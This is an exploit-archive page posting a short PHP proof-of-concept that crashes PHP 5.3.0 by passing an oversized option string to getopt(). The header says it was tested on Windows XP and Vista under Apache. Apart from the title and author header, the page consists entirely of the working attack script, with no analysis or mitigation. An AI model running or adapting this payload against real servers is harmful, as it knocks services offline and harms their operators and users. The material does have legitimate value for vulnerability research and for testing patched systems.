Home / os / win7

PHP 5.3.0 getopt() Denial of Service

Posted on 12 April 2010

==================================== PHP 5.3.0 getopt() Denial of Service ==================================== <?php ##################################################################### ## PHP 5.3.0 getopt() Denial of service ## Tested on WIN XP FR SP3, WIN VISTA FR SP2, Apache, PHP 5.3.0 ## Denial of service ## Author: Napst3r ## Greets To: My Laptop & all My Friends ##################################################################### $buffer = str_repeat('A:', 9999); $options = getopt($buffer); ?> # Inj3ct0r.com [2010-04-12]

 

TOP